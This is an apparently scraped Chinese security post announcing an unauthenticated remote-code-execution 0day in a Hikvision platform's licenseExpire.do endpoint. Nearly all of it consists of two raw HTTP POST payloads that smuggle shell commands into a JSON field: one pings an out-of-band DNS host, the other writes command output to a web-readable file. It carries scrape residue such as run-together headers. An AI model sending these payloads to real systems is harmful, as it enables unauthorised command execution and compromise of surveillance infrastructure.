[企业安全运维] 海康威视现新0day 可未授权致RCE 速查！

payload：POST/portal/cas/login/ajax/licenseExpire.do HTTP/1.1Host:Content-Type:application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116Safari/537.36{"type":"environment","operate":"","machines":{"id":"$(ping+qsdiehtuxn.dgrh3.cn)"}Copyto clipboardErrorCopied文件路径 /vms/static/1.txt payload：POST/portal/cas/login/ajax/licenseExpire.do HTTP/1.1Host:Cache-Control: max-age=0Accept: application/json, text/javascript,*/*; q=0.01X-Requested-With: XMLHttpRequestIf-Modified-Since: Thu, 01 Jun 197000:00:00 GMTUser-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0Safari/537.36Content-Type:application/x-www-form-urlencodedAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9Cookie:JSESSIONID=jp9u6tFmSc3fk7Jzf9DQjK25abfBb_b4Yy1r4rax; curtTabId=all; configMenu=Connection: closeContent-Length: 135{"type":"environment","operate":"","machines":{"id":"$(id>/opt/hikvision/web/components/tomcat85linux64.1/webapps/vms/static/1.txt)"}